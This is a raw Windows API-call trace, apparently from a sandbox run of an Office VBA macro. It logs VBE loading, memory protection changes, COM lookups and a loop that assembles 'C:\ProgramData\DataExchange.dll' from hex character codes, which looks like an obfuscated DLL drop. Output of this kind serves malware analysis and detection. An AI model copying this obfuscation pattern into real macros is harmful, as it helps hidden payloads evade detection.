[0202.996] VirtualProtect (in: lpAddress=0x9c54f30, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0202.997] GetCurrentProcess () returned 0xffffffffffffffff [0202.997] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0202.997] GetCurrentProcess () returned 0xffffffffffffffff [0202.997] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0202.997] GetCurrentProcess () returned 0xffffffffffffffff [0202.997] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fd0, dwSize=0x2) returned 1 [0202.997] GetCurrentProcess () returned 0xffffffffffffffff [0202.997] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55024, dwSize=0x55) returned 1 [0202.997] VirtualProtect (in: lpAddress=0x9c55024, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0202.997] SetErrorMode (uMode=0x8001) returned 0x8001 [0202.998] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0202.998] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0202.999] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cd2) returned 1 [0202.999] SetErrorMode (uMode=0x8001) returned 0x8001 [0203.000] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x2c6) returned 0x7fee51a993c [0203.000] GetCurrentProcess () returned 0xffffffffffffffff [0203.000] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e2dd4, dwSize=0x43) returned 1 [0203.000] RtlLookupFunctionEntry (in: ControlPc=0x95e2dd4, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0203.000] VirtualProtect (in: lpAddress=0x95e2dd4, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x4) returned 1 [0203.001] RtlAddFunctionTable (FunctionTable=0x95e2e24, EntryCount=0x1, BaseAddress=0x95e2d00, TargetGp=0x1dc73c) returned 1 [0203.001] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.001] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.001] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.001] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.001] IUnknown:AddRef (This=0xa02b160) returned 0x6 [0203.001] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.001] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.001] IUnknown:Release (This=0xa02b160) returned 0x5 [0203.001] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0203.001] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.001] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.001] IUnknown:Release (This=0xa02b058) returned 0x1 [0203.001] IUnknown:AddRef (This=0xa02b420) returned 0x5 [0203.002] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.002] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.002] IUnknown:Release (This=0xa02b420) returned 0x4 [0203.002] IUnknown:AddRef (This=0xa121118) returned 0x3 [0203.002] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.002] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.002] IUnknown:Release (This=0xa121118) returned 0x2 [0203.002] IUnknown:AddRef (This=0xa121698) returned 0x9 [0203.002] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.002] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.002] IUnknown:Release (This=0xa121698) returned 0x8 [0203.002] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0203.002] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0203.002] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0203.002] IUnknown:Release (This=0xa02ae48) returned 0x4 [0203.002] GetAsyncKeyState (vKey=27) returned 0 [0203.002] GetUserDefaultLCID () returned 0x409 [0203.002] malloc (_Size=0xa0) returned 0x48ab340 [0203.002] realloc (_Block=0x48ab340, _Size=0x140) returned 0x11f50350 [0203.003] free (_Block=0x11f50350) [0203.004] VarBstrCat (in: bstrLeft="&H", bstrRight="43", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654018, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0203.004] VarBstrCat (in: bstrLeft="&H", bstrRight="3a", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6d88, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0203.004] VarBstrCat (in: bstrLeft="&H", bstrRight="5c", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0203.005] VarBstrCat (in: bstrLeft="&H", bstrRight="50", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0203.005] VarBstrCat (in: bstrLeft="&H", bstrRight="72", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7983e88, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0203.005] VarBstrCat (in: bstrLeft="&H", bstrRight="6f", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0203.006] VarBstrCat (in: bstrLeft="&H", bstrRight="67", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e48, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0203.006] VarBstrCat (in: bstrLeft="&H", bstrRight="72", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0203.006] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.006] VarBstrCat (in: bstrLeft="&H", bstrRight="6d", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653e58, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0203.007] VarBstrCat (in: bstrLeft="&H", bstrRight="44", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654f58, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0203.007] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655078, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.007] VarBstrCat (in: bstrLeft="&H", bstrRight="74", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654ab8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0203.008] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654338, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.008] VarBstrCat (in: bstrLeft="&H", bstrRight="5c", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9656418, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0203.008] VarBstrCat (in: bstrLeft="&H", bstrRight="44", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655118, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0203.008] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654658, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.009] VarBstrCat (in: bstrLeft="&H", bstrRight="74", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96553d8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0203.009] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9656598, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.009] VarBstrCat (in: bstrLeft="&H", bstrRight="45", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654178, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0203.009] VarBstrCat (in: bstrLeft="&H", bstrRight="78", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9657338, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0203.010] VarBstrCat (in: bstrLeft="&H", bstrRight="63", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654418, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0203.010] VarBstrCat (in: bstrLeft="&H", bstrRight="68", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655438, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0203.010] VarBstrCat (in: bstrLeft="&H", bstrRight="61", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654738, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0203.010] VarBstrCat (in: bstrLeft="&H", bstrRight="6e", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654c58, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0203.011] VarBstrCat (in: bstrLeft="&H", bstrRight="67", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9655718, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0203.011] VarBstrCat (in: bstrLeft="&H", bstrRight="65", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654278, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0203.011] VarBstrCat (in: bstrLeft="&H", bstrRight="2e", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654258, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0203.011] VarBstrCat (in: bstrLeft="&H", bstrRight="64", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9654358, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0203.012] VarBstrCat (in: bstrLeft="&H", bstrRight="6c", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653e98, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0203.012] VarBstrCat (in: bstrLeft="&H", bstrRight="6c", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653a18, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0203.013] IMalloc:Alloc (This=0x7fefecb5380, cb=0x810) returned 0x9aa6420 [0203.013] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x95e3230 [0203.013] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0203.013] IUnknown:Release (This=0xa02b058) returned 0x1 [0203.013] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0203.013] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.013] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.013] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.013] GetCurrentProcess () returned 0xffffffffffffffff [0203.013] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0203.013] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0203.013] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.013] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0203.013] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0203.013] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0203.013] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0203.013] IUnknown:Release (This=0xa02b108) returned 0x5 [0203.013] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a02b6, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="brt") returned 4 [0203.014] ITypeComp:RemoteBind (in: This=0xa02b110, szName="brt", lHashVal=0x107a66, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a02b6, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="brt") returned 4 [0203.015] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="brt", lHashVal=0x107a66, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a02b6, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="brt") returned 4 [0203.015] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="brt", lHashVal=0x107a66, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a02b6, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="brt") returned 4 [0203.015] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="brt", lHashVal=0x107a66, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a02b6, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="brt") returned 4 [0203.015] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="brt", lHashVal=0x107a66, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.015] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.015] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x63a02b6 | out: _Dst=0x9653e90) returned 0x0 [0203.015] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_brt") returned 0x103777 [0203.015] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xb, _Src="_B_var_brt" | out: _Dst="_B_var_brt") returned 0x0 [0203.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpWideCharStr=0x1dc530, cchWideChar=11 | out: lpWideCharStr="_B_var_brt") returned 11 [0203.015] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.015] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_brt", lHashVal=0x103777, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.015] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.015] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0203.016] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_brt", lHashVal=0x103777, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.016] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0203.016] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0203.016] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_brt", lHashVal=0x103777, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.016] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0203.016] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0203.016] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_brt", lHashVal=0x103777, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.016] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0203.016] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.016] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0912, cbMultiByte=11, lpWideCharStr=0x1dc590, cchWideChar=12 | out: lpWideCharStr="_B_var_brt") returned 11 [0203.016] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_brt", lHashVal=0x103777, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x62005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x62005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.016] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9618b10, cb=0x2000) returned 0x98ea850 [0203.016] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x4, _Src=0x63a02b6 | out: _Dst=0x1dc750) returned 0x0 [0203.016] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.016] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0xa, _Src=0x63a02da | out: _Dst=0x1dc9f0) returned 0x0 [0203.016] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x7, _Src=0x63a0306 | out: _Dst=0x1dc9f0) returned 0x0 [0203.016] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x9, _Src=0x63a032e | out: _Dst=0x1dc9f0) returned 0x0 [0203.016] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0x9653e90 [0203.016] _mbscpy_s 